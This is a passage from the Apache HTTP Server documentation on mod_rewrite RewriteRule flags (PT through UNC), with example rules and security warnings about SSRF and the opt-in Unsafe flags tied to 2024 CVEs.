<p> You must make sure that the substitution string is a valid URL (typically starting with <code>http://</code><em>hostname</em>) which can be handled by the <code class="module"><a href="../mod/mod_proxy.html">mod_proxy</a></code>. If not, you will get an error from the proxy module. Use this flag to achieve a more powerful implementation of the <code class="directive"><a href="../mod/mod_proxy.html#proxypass">ProxyPass</a></code> directive, to map remote content into the namespace of the local server.</p> <div class="warning"> <h3>Security Warning</h3> <p>Take care when constructing the target URL of the rule, considering the security impact of allowing the client influence over the set of URLs to which your server will act as a proxy. If any part of the target URL is derived from user input (backreferences, query strings, etc.), an attacker may be able to cause your server to make requests to arbitrary internal or external hosts. This is known as a Server-Side Request Forgery (SSRF) vulnerability. Ensure that the scheme and hostname part of the URL is either fixed, or does not allow the client undue influence.</p> </div> <div class="warning"> <h3>Performance warning</h3> <p>Using this flag triggers the use of <code class="module"><a href="../mod/mod_proxy.html">mod_proxy</a></code>, without handling of persistent connections as the default worker is used in this case, which does not handle connection pooling/reuse.</p> <p>In order to use persistent connections you need to setup a <code class="directive"><a href="../mod/mod_proxy.html#proxy">Proxy</a></code> block at least for the scheme and host part of the target URL containing a <code class="directive"><a href="../mod/mod_proxy.html#proxyset">ProxySet</a></code> directive where you e.g. set a timeout.</p> <p>If you set it up with <code class="directive"><a href="../mod/mod_proxy.html#proxypass">ProxyPass</a></code> or <code class="directive"><a href="../mod/mod_proxy.html#proxypassmatch">ProxyPassMatch</a></code> persistent connections will be used automatically.</p> </div> <p>Note: <code class="module"><a href="../mod/mod_proxy.html">mod_proxy</a></code> must be enabled in order to use this flag.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_pt">PT|passthrough <a title="Permanent link" href="#flag_pt" class="permalink">¶</a></h2> <p> The target (or substitution string) in a RewriteRule is assumed to be a file path, by default. The use of the [PT] flag causes it to be treated as a URL-path instead. That is to say, the use of the [PT] flag causes the result of the <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> to be passed back through URL mapping, so that location-based mappings, such as <code class="directive"><a href="../mod/mod_alias.html#alias">Alias</a></code>, <code class="directive"><a href="../mod/mod_alias.html#redirect">Redirect</a></code>, or <code class="directive"><a href="../mod/mod_alias.html#scriptalias">ScriptAlias</a></code>, for example, might have a chance to take effect. </p> <p> If, for example, you have an <code class="directive"><a href="../mod/mod_alias.html#alias">Alias</a></code> for /icons, and have a <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> pointing there, you should use the [PT] flag to ensure that the <code class="directive"><a href="../mod/mod_alias.html#alias">Alias</a></code> is evaluated. </p> <pre class="prettyprint lang-config">Alias "/icons" "/usr/local/apache/icons" RewriteRule "/pics/(.+)\.jpg$" "/icons/$1.gif" [PT]</pre> <p> Omission of the [PT] flag in this case will cause the Alias to be ignored, resulting in a 'File not found' error being returned. </p> <p>The <code>PT</code> flag implies the <code>L</code> flag: rewriting will be stopped in order to pass the request to the next phase of processing.</p> <p>Note that the <code>PT</code> flag is implied in per-directory contexts such as <code class="directive"><a href="../mod/core.html#directory"><Directory></a></code> sections or in <code>.htaccess</code> files. The only way to circumvent that is to rewrite to <code>-</code>.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_qsa">QSA|qsappend <a title="Permanent link" href="#flag_qsa" class="permalink">¶</a></h2> <p> When the replacement URL contains a query string, the default behavior of <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> is to discard the existing query string, and replace it with the newly generated one. Using the [QSA] flag causes the query strings to be combined. </p> <p>Consider the following rule:</p> <pre class="prettyprint lang-config">RewriteRule "/pages/(.+)" "/page.php?page=$1" [QSA]</pre> <p>With the [QSA] flag, a request for <code>/pages/123?one=two</code> will be mapped to <code>/page.php?page=123&one=two</code>. Without the [QSA] flag, that same request will be mapped to <code>/page.php?page=123</code> - that is, the existing query string will be discarded. </p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_qsd">QSD|qsdiscard <a title="Permanent link" href="#flag_qsd" class="permalink">¶</a></h2> <p> When the requested URL contains a query string, and the target URL does not, the default behavior of <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> is to copy that query string to the target URL. Using the [QSD] flag causes the query string to be discarded. </p> <p>This flag is available in version 2.4.0 and later.</p> <p> Using [QSD] and [QSA] together will result in [QSD] taking precedence. </p> <p> If the target URL has a query string, the default behavior will be observed - that is, the original query string will be discarded and replaced with the query string in the <code>RewriteRule</code> target URL. </p> <pre class="prettyprint lang-config"># Redirect old search URLs to the new path, discarding the query string. # /search?q=term&page=2 becomes /find (query string removed) RewriteRule "^/search" "/find" [QSD,R=301,L]</pre> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_qsl">QSL|qslast <a title="Permanent link" href="#flag_qsl" class="permalink">¶</a></h2> <p> By default, the first (left-most) question mark in the substitution delimits the path from the query string. Using the [QSL] flag instructs <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> to instead split the two components using the last (right-most) question mark. </p> <p> This is useful when mapping to files that have literal question marks in their filename. If no query string is used in the substitution, a question mark can be appended to it in combination with this flag. </p> <p>For example, if a legacy application expects a query string that itself contains a question mark:</p> <pre class="prettyprint lang-config"># Map /lookup/foo?bar to /app?type=foo?bar # Without [QSL], the first ? in the substitution would split the # path, producing /app with query string type=foo?bar incorrectly. # With [QSL], the LAST ? is used as the delimiter. RewriteRule "^/lookup/(.*)" "/app?type=$1" [QSL,PT]</pre> <p>Without [QSL], the substitution <code>/app?type=foo?bar</code> would be split at the first <code>?</code>, losing the literal question mark in the value.</p> <p> This flag is available in version 2.4.19 and later.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_r">R|redirect <a title="Permanent link" href="#flag_r" class="permalink">¶</a></h2> <p> Use of the [R] flag causes a HTTP redirect to be issued to the browser. If a fully-qualified URL is specified (that is, including <code>http://servername/</code>) then a redirect will be issued to that location. Otherwise, the current protocol, servername, and port number will be used to generate the URL sent with the redirect. </p> <p> <em>Any</em> valid HTTP response status code may be specified, using the syntax [R=305], with a 302 status code being used by default if none is specified. The status code specified need not necessarily be a redirect (3xx) status code. However, if a status code is outside the redirect range (300-399) then the substitution string is dropped entirely, and rewriting is stopped as if the <code>L</code> were used.</p> <p>In addition to response status codes, you may also specify redirect status using their symbolic names: <code>temp</code> (default), <code>permanent</code>, or <code>seeother</code>.</p> <p> You will almost always want to use [R] in conjunction with [L] (that is, use [R,L]) because on its own, the [R] flag prepends <code>http://thishost[:thisport]</code> to the URL-path, but then passes this on to the next rule in the ruleset, which can often result in 'Invalid URI in request' warnings. </p> <p>Note: httpd only supports status codes that are included in the HTTP spec. Using an unrecognized status code will result in a 500 error and error log message.</p> <div class="warning"><h3>[R=4xx] does not serve the substitution</h3> <p>When a status code outside the 300-399 range is specified (e.g., <code>[R=403]</code> or <code>[R=410]</code>), the <em>substitution string is ignored</em>. The URL you wrote as the target is not served to the client. Instead, httpd returns the specified status code and handles it through the normal error response path (including any configured <code class="directive"><a href="../mod/core.html#errordocument">ErrorDocument</a></code>). If you want to deny access, the <a href="#flag_f">[F]</a> and <a href="#flag_g">[G]</a> flags are clearer ways to express the same intent.</p> </div> <pre class="prettyprint lang-config"># Redirect requests for the old docs path to the new location. RewriteRule "^/docs/(.*)$" "http://docs.example.com/$1" [R=301,L]</pre> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_s">S|skip <a title="Permanent link" href="#flag_s" class="permalink">¶</a></h2> <p>The [S] flag is used to skip rules that you don't want to run. The syntax of the skip flag is [S=<em>N</em>], where <em>N</em> signifies the number of rules to skip (provided the <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule"> RewriteRule</a></code> and any preceding <code class="directive"><a href="../mod/mod_rewrite.html#rewritecond"> RewriteCond</a></code> directives match). This can be thought of as a <code>goto</code> statement in your rewrite ruleset. In the following example, we only want to run the <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule"> RewriteRule</a></code> if the requested URL-path doesn't correspond with an actual file.</p> <pre class="prettyprint lang-config"># Is the request for a non-existent file? RewriteCond "%{REQUEST_FILENAME}" !-f RewriteCond "%{REQUEST_FILENAME}" !-d # If so, skip these two RewriteRules RewriteRule ".?" "-" [S=2] RewriteRule "(.*\.gif)" "images.php?$1" RewriteRule "(.*\.html)" "docs.php?$1"</pre> <p>This technique is useful because a <code class="directive"><a href="../mod/mod_rewrite.html#rewritecond">RewriteCond</a></code> only applies to the <code class="directive"><a href="../mod/mod_rewrite.html#rewriterule">RewriteRule</a></code> immediately following it. Thus, if you want to make a <code>RewriteCond</code> apply to several <code>RewriteRule</code>s, one possible technique is to negate those conditions and add a <code>RewriteRule</code> with a [Skip] flag. You can use this to make pseudo if-then-else constructs: The last rule of the then-clause becomes <code>skip=N</code>, where N is the number of rules in the else-clause:</p> <pre class="prettyprint lang-config"># Does the file exist? RewriteCond "%{REQUEST_FILENAME}" !-f RewriteCond "%{REQUEST_FILENAME}" !-d # Create an if-then-else construct by skipping 3 lines if we meant to go to the "else" stanza. RewriteRule ".?" "-" [S=3] # IF the file exists, then: RewriteRule "(.*\.gif)" "images.php?$1" RewriteRule "(.*\.html)" "docs.php?$1" # Skip past the "else" stanza. RewriteRule ".?" "-" [S=1] # ELSE... RewriteRule "(.*)" "404.php?file=$1" # END</pre> <p>It is probably easier to accomplish this kind of configuration using the <code class="directive"><If></code>, <code class="directive"><ElseIf></code>, and <code class="directive"><Else></code> directives instead.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_t">T|type <a title="Permanent link" href="#flag_t" class="permalink">¶</a></h2> <p>Sets the MIME type with which the resulting response will be sent. This has the same effect as the <code class="directive"><a href="../mod/mod_mime.html#addtype">AddType</a></code> directive.</p> <p>For example, you might use the following technique to serve Perl source code as plain text, if requested in a particular way:</p> <pre class="prettyprint lang-config"># Serve .pl files as plain text RewriteRule "\.pl$" "-" [T=text/plain]</pre> <p>Or, perhaps, if you have a camera that produces jpeg images without file extensions, you could force those images to be served with the correct MIME type by virtue of their file names:</p> <pre class="prettyprint lang-config"># Files with 'IMG' in the name are jpg images. RewriteRule "IMG" "-" [T=image/jpg]</pre> <p>Please note that this is a trivial example, and could be better done using <code class="directive"><a href="../mod/core.html#filesmatch"><FilesMatch></a></code> instead. Always consider the alternate solutions to a problem before resorting to rewrite, which will invariably be a less efficient solution than the alternatives.</p> <p> If used in per-directory context, use only <code>-</code> (dash) as the substitution <em>for the entire round of <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> processing</em>, otherwise the MIME-type set with this flag is lost due to an internal re-processing (including subsequent rounds of <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> processing). The <code>L</code> flag can be useful in this context to end the <em>current</em> round of <code class="module"><a href="../mod/mod_rewrite.html">mod_rewrite</a></code> processing.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_unsafe_allow_3f">UnsafeAllow3F <a title="Permanent link" href="#flag_unsafe_allow_3f" class="permalink">¶</a></h2> <p> Setting this flag is required to allow a rewrite to continue If the HTTP request being written has an encoded question mark, '%3f', and the rewritten result has a '?' in the substitution. This protects from a malicious URL taking advantage of a capture and re-substitution of the encoded question mark.</p> <pre class="prettyprint lang-config"># A PHP front controller that routes all requests via a query parameter. # Without UnsafeAllow3F, a request like /page%3Fname=test would return # 403 Forbidden because the rewritten substitution contains '?' while # the original request contains an encoded '%3F'. RewriteCond "%{REQUEST_FILENAME}" !-f RewriteCond "%{REQUEST_FILENAME}" !-d RewriteRule "(.+)" "index.php?route=$1" [L,QSA,UnsafeAllow3F]</pre> <div class="warning"> This flag exists because of <a href="https://www.cve.org/CVERecord?id=CVE-2024-38474">CVE-2024-38474</a>. Use it only on rules where you are certain that user-supplied <code>%3F</code> in the request cannot be exploited to manipulate the query string of the substitution target. Prefer restructuring URLs to avoid encoded question marks where possible. </div> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_unsafe_prefix_stat">UnsafePrefixStat <a title="Permanent link" href="#flag_unsafe_prefix_stat" class="permalink">¶</a></h2> <p> Setting this flag is required in server-scoped substitutions start with a variable or backreference and resolve to a filesystem path. These substitutions are not prefixed with the document root. This protects from a malicious URL causing the expanded substitution to map to an unexpected filesystem location.</p> <p>Available in Apache HTTP Server 2.4.60 and later.</p> <pre class="prettyprint lang-config"># This rule starts the substitution with a backreference. # Since 2.4.60, this is rejected by default to prevent the expanded # path from escaping the document root (CVE-2024-38475). # Only add UnsafePrefixStat after verifying the substitution cannot # resolve to a filesystem path outside your web root. RewriteRule "^/mirror/(.+)$" "$1" [PT,UnsafePrefixStat]</pre> <div class="warning"> This flag exists because of <a href="https://www.cve.org/CVERecord?id=CVE-2024-38475">CVE-2024-38475</a>. Without it, a substitution beginning with a backreference or variable that happens to match an existing filesystem path could allow requests to escape the document root. Use this flag only after confirming that the substitution is adequately constrained. </div> </div><div class="top"><a href="#page-header"><img alt="top" src="../../images/up.gif"></a></div> <div class="section"> <h2 id="flag_unc">UNC <a title="Permanent link" href="#flag_unc" class="permalink">¶</a></h2> <p> Setting this flag prevents the merging of multiple leading slashes, as used in Windows UNC paths. The flag is not necessary when the rules substitution starts with multiple literal slashes.</p> <p>Available in Apache HTTP Server 2.4.63 and later.</p> <pre class="prettyprint lang-config"># On Windows, rewrite to a UNC file share using a variable. # Without [UNC], the leading slashes in the substitution would be # collapsed (//server/share becomes /server/share). RewriteCond "%{HTTP_HOST}" "^(.+)\.internal$" RewriteRule "^/shared/(.*)$" "//%1/fileshare/$1" [UNC]</pre> <p>This flag is only relevant on Windows. It prevents Apache from merging the leading double slash (<code>//</code>) that denotes a UNC path when the path is constructed from a backreference or variable. If the substitution begins with literal double slashes, no flag is needed.</p> </div></div> <div class="bottomlang"> <p><span>Available Languages: </span><a href="../../en/rewrite/flags.html" title="English"> en </a> | <a href="../../fr/rewrite/flags.html" hreflang="fr" rel="alternate" title="Français"> fr </a></p> </div><div id="footer"> <p class="apache">Copyright 2026 The Apache Software Foundation.<br>Licensed under the <a href="https://www.apache.org/licenses/LICENSE-2.0">Apache License, Version 2.0</a>.</p> <p class="menu"><a href="../mod/index.html">Modules</a> | <a href="../mod/quickreference.html">Directives</a> | <a href="https://cwiki.apache.org/confluence/display/httpd/FAQ">FAQ</a> | <a href="../glossary.html">Glossary</a> | <a href="../sitemap.html">Sitemap</a> | <a href="https://bz.apache.org/bugzilla/enter_bug.cgi?product=Apache%20httpd-2">Report a bug</a></p></div><script><!--//--><![CDATA[//><!-- if (typeof(prettyPrint) !== 'undefined') { prettyPrint(); } var langToggle = document.querySelector('.lang-toggle'); var topLang = document.querySelector('.toplang'); if (langToggle && topLang) { langToggle.addEventListener('click', function() { topLang.classList.toggle('open'); }); } var qv = document.getElementById('quickview'); if (qv) { document.body.appendChild(qv); var qvBtn = document.createElement('button'); qvBtn.className = 'qv-toggle'; qvBtn.setAttribute('aria-label', 'Toggle page navigation'); qvBtn.innerHTML = '☰'; document.body.appendChild(qvBtn); qvBtn.addEventListener('click', function() { var isOpen = qv.classList.toggle('open'); if (isOpen) { qv.style.top = window.scrollY + 10 + 'px'; } }); window.addEventListener('scroll', function() { qv.classList.remove('open'); }); } //--><!]]></script> </body></html>